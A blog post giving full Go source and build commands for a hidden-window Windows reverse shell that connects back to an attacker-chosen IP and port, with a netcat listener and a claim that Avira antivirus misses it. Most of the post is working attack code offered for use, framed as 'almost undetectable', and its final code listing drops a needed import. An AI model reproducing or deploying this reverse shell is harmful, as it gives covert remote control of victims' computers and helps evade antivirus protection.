Basic reverse shell in golang (almost undetectable, hide cmd window)

Yoplux
4 min readMay 11, 2021

--

I found it on sysdream.com

First, what is a reverse shell :

Also called reverse tunnel is a computer technique that allows to redirect on a local computer the input and output of a shell to a remote computer, through a service able to interact between the two computers. One of the advantages of this technique is to make a local shell accessible from the remote server without being blocked by a firewall

Let’s code it

package mainimport (      "net"         "os"        "os/exec"      "syscall"
)
  • net is required to establish a connection
  • os is required to call os.Exit()
  • os/exec is required to execute command on the target machine
  • syscall contains an interface to the low-level operating system primitives
var connectString stringfunc main() {if len(connectString) == 0 {os.Exit(1)}
  • var connectString string will be set during the compilation, it is the ip address and the port
conn, err := net.Dial("tcp", connectString)if err != nil {os.Exit(1)}
  • net.Dial connects to the address on the named network, in our case it will be the values into the variable connectString
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
  • cmd := exec.Command(“cmd.exe”) cmd represents an external command being prepared or run, exec.Command execute the command cmd.exe
  • cmd.SysProcAttr we use it to hide the cmd.exe window, this is the key to hide our reverse shell, we will need something else during the compilation !
cmd.Stdin = conncmd.Stdout = conncmd.Stderr = conn
  • Redirection of the inputs and outputs of this process
    to the open connection we initialized above into the “conn” variable.
cmd.Run()
  • cmd.Run() we run the command into the cmd variable

Here is the full code !

package mainimport (
"net"
"os"
"os/exec"
)
var connectString stringfunc main() {if len(connectString) == 0 {
os.Exit(1)
}
conn, err := net.Dial("tcp", connectString)
if err != nil {
os.Exit(1)
}
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()}

Now we can compile it, your ip address (the ip of your hacking box to receive the connection) , in my case it’s 192.168.1.32 because i am on my local network, we use the port 2233 because it is not used but you can use any free ports the target machine :

go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go
  • ldflags change the value of variables at build time and introduce your own dynamic information into a binary
  • -H=windowsgui writes a “GUI binary” instead of a “console binary”
  • -X flag to write information into the variable at link time, followed by the package path to the variable and its new value

So, let’s give a try on a windows VM and your Fav Linux Distrib.

How you can see i use avira as a ANTIVIRUS

You can use Netcat to listen on the port 2233 to receive the connection :

Now drag and drop the reverse.exe file and double click on it, nothing append from the target view:

If make a get-process to see if the reverse.exe is running you will see that he his running there is no problem at all, Avira did not detect anything !

Now we can take a look to our Netcat :

We have a shell, you can now play with it !!

As i said he his almost undetectable.

In a near futur i will make the cmd open in the background and do much more like connect it to a VPS with a TLS crypted connection to try it in real condition, you can do much more by looking at the author of this code on :

Signed Alix.

--

--